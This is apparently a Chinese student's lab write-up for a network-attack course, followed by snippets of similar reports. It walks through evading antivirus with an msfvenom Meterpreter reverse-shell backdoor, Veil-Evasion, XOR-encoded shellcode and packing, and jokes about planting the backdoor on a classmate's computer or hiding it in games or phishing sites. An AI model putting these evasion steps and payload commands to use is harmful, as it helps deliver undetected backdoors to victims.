20154307《网络对抗》Exp3 免杀原理与实践

20154307《网络对抗》Exp3 免杀原理与实践

一、基础问题回答

(1)杀软是如何检测出恶意代码的?

基于特征码的检测:杀毒软件检测到有程序包含的特征码与其特征码库的代码相匹配,就会把该程序当作恶意软件。

启发式恶意软件检测

基于行为的恶意软件检测:检测程序是否会有一些恶意行为,如修改注册表,更改权限等等。。

(2)免杀是做什么?

让攻击程序不被杀软查杀

(3)免杀的基本方法有哪些?

加壳

改变特征码

二、实践内容

1、使用msf生成后门程序的检测

由于上一个实验我们已经用msf生成了一个后门程序,于是我就直接用上一个后门来检测

当然。。。结果是不容乐观的,毕竟上次的实验是在关闭杀软和防火墙的情况下做的。。。。

360也无情查杀。。

用msf多次编译检测结果也好,这里我就没有截图。。。。

2、使用veil-evasion生成后门程序的检测

首先啊,这个部分之前,我们要先安装veil-evasion

sudo apt-get install veil-evasion这个命令,安装之。。。

(过程中,下载速度和安装速度实在无力吐槽。。。。心累)

下载安装好以后,我们在终端输入veil

输入use 1进入如下界面

输入list,查看payload模板,嗯,挺多的,有41个。。。

这里我选择了6

如下图我更改了端口号和IP地址

我把它命名为4307

检测该文件,稍微好了一点,不枉我下载和安装了那么久的veil

360依然无情。。。。。

3、利用shellcode编写后门程序的检测

在终端输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali的ip PORT=端口号 -f exe > met.exe

把这段机器指令复制下来

我首先在linux情况下,生成了exe

检测结果不是很乐观啊。。。

360也拦截了他

于是我在用codeblocks做了一遍,生成的exe检测结果比linux稍微好了一些

同时,360沦陷了,哈哈哈

4、将shellcode异或

我把之前复制出来的机器指令,和43异或,这个可以在codeblocks实现。

把异或的结果输入buf,然后在主函数中将其在此异或

大概就像上图那样。。。。。这个我是在linux下完成的。。

生成的exe检测。。结果。。。。。并没有我想象中那么好。。。

然后我用了codeblock。。。发现比linux下好一些。。。

我把异或的数字换成了17,发现结果稍微好了一些。。。。(这个是在codeblocks上做的)

当然,对shellcode的修改不止有异或,我们还可以逆序,或者把异或和逆序结合,我想这样可能报病毒的概率会更低。。。但由于时间有限,我也没做更多的尝试。。。。。。

以上三个exe,360全部阵亡。。。。。,以下是我的回连结果。。。

可以回连的。。想到上一次实验的窥屏。。。。。。。把这个植入同学的电脑。。。嘿嘿嘿。。

5、加壳

我把上一次veil生成的exe,加了壳。。。。额。。。

下面这个是加壳之前的。。。。。

崩溃了,边上的同学加壳以后报病毒是0。。。0。。。。

综上,这次实验就做完了。。

三、离实战还缺些什么技术或步骤?

我觉得shellcode的异或已经可以欺骗一部分用户了,例如360的用户。虽然报病毒的概率还有待降低。当然,把攻击程序装入靶机还是需要一定的技术的,例如把他藏在一个什么游戏之下(贪玩蓝月),或是一些钓鱼网站。。。。然后随着杀毒软件的库在不断更新,我们的技术也不能一直使用,也要同时去更新。

四、实验总结与体会

360确实不够厉害,而且我们也不能完全把电脑的安全依赖于杀软,杀软只能用于病毒的防范,病毒的防范,还是要看自己,在上网,玩游戏的时候要有安全意识。

同时,我们做的免杀还是比较基础的,在免杀的制作和防范上,我们要走的路还是很远的。。。。

嗯,这次实验还是很有意思的。。。。

原文地址:https://www.cnblogs.com/gnlm/p/8734286.html

时间: 2024-10-07 18:30:09

20154307《网络对抗》Exp3 免杀原理与实践的相关文章

网络对抗 Exp3 免杀原理与实践 20154311 王卓然

Exp3 免杀原理与实践 一.基础问题回答 (1)杀软是如何检测出恶意代码的?  ①基于特征码的检测:AV软件厂商通过检测一个可执行文件是否包含一段与特征码库中相匹配的特征码从而判断是否为恶意软件.  ②启发式恶意软件检测:就是根据一个程序的特征和行为如果与恶意软件相似,就判定为恶意软件. ③基于行为的恶意软件检测:同启发式,启发式偏向于对程序的特征扫描,基于行为的则是多了对程序的行为监控. (2)免杀是做什么? 免杀就是使恶意软件能不被AV软件的检测出来,其本身安装的后门能够不被发现,成功存活

20145331魏澍琛《网络对抗》——免杀原理与实践

20145331魏澍琛<网络对抗>--免杀原理与实践 问题回答 1.杀软是如何检测出恶意代码的? 一个是基于特征码的检测,第二个是启发式恶意软件检测,最后是基于行为的恶意软件检测 2.免杀是做什么? 让病毒不被杀毒软件kill掉 3.免杀的基本方法有哪些? a)可以用这次实验所涉及的改变特征码 b)加壳:就是相当于把你的后门代码封装起来,但是现在大部分公开的壳都能被杀毒软件查出来,效果其实不好 实践过程 一.使用msf生成后门程序的检测 1.用上节课所讲的msf生成一个后门 2.到相应网站上查

20145239杜文超《网络对抗》- 免杀原理与实践

<网络对抗>- 免杀原理与实践 基础问题回答 (1)杀软是如何检测出恶意代码的? 根据搜集来的最全的.最新的特征码库,检测程序有没有异常或者可疑的行为. (2)免杀是做什么? 利用一些手段,让你的的后门不被AV软件发现. (3)免杀的基本方法有哪些? 加壳.用其他语言进行重写再编译. 使用反弹式连接. 自己手工编一个. 实践总结与体会 这次的免杀实验做得非常顺利,每一个步骤基本上都一次成功,虽然这正是我所希望的但也有不好就是万一下次遇到问题可能不会解决,毕竟遇到问题.解决问题的过程才能让学习的

20155324《网络对抗》免杀原理与实践

20155324<网络对抗>免杀原理与实践 免杀原理 实验内容 (1)理解免杀技术原理 (2)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧: (3)通过组合应用各种技术实现恶意代码免杀 (4)用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 基础问题回答 (1)杀软是如何检测出恶意代码的? 正常行为分析法:正常行为分析常被应用于异常检测之中,是指对程序的正常行为轮廓进行分析和表示,为程序建立一个安全行为库,当被监测

2018-2019-2 20165205 网络攻防Exp3免杀原理与实践

2018-2019-2 20165205 网络攻防Exp3免杀原理与实践 一.实践内容 1.1正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程 1.1.1正确使用msf编码器 尝试用msf编码器对后门程序进行多次编码,尝试降低被查杀概率 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 55 -b '\x00' LHOST=10.

2017-2018-4 20155317《网络对抗技术》EXP3 免杀原理与实践

2017-2018-4 20155317<网络对抗技术>EXP3 免杀原理与实践 一.问题回答 (1)杀软是如何检测出恶意代码的? (2)免杀是做什么? (3)免杀的基本方法有哪些? 2.实践 (1) 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧 首先尝试一下自己上个实验做出的后门程序 果然是不堪一击...拿去检测一下 装上veil尝试一下结果会如何 : 温馨提示一下,刚开始我是用的自己装的64的ka

2017-2018-2 《网络对抗技术》 20155322 Exp3 免杀原理与实践

#2017-2018-2 <网络对抗技术> 20155322 Exp3 免杀原理与实践 [-= 博客目录 =-] 1-实践目标 1.1-实践介绍 1.2-实践内容 1.3-实践要求 2-实践过程 2.1-正确使用msf编码器 2.2-veil-evasion 2.3-组合应用技术实现免杀 2.4-靶机实测 2.5-基础问题回答 3-资料 1-实践目标 1.1-实践介绍:免杀 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术. 要做好免杀,就时清楚杀毒软件(恶意软件

20155218《网络对抗》Exp3 免杀原理与实践

20155218<网络对抗>Exp3 免杀原理与实践 一.使用msf生成后门程序的检测 (1)将上周msf生成的后门文件放在virscan.org中进行扫描,截图如下: (2)使用msf时对它多编码1次并进行测试 发现能发现的杀软变少: (3)使用msf时对它多编码10次并进行测试 编码10次后,发现可以查杀的杀软数量仅仅减少了一个: 二.使用veil-evasion生成后门程序的检测 通过list查看功能,选用22命令 生成文件: 测试结果: 显而易见,效果并不理想: 三.利用shellco

20155232《网络对抗》Exp3 免杀原理与实践

20155232<网络对抗>Exp3 免杀原理与实践 问题回答 1.基础问题回答 (1)杀软是如何检测出恶意代码的? 基于特征码的检测 特征码:一段特征码就是一段或多段数据. 如果一个可执行文件(或其他运行的库.脚本等)包含这样的数据则被认为是恶意代码. 启发式恶意软件检测 根据些片面特征去推断. 通用性,不精确. 基于行为的恶意软件检测 修改文件硬盘.连接恶意网站.修改注册表 (2)免杀是做什么? 通过一些手段来瞒过杀软的检测扫描.避免被杀毒软件查杀. (3)免杀的基本方法有哪些? 改变特征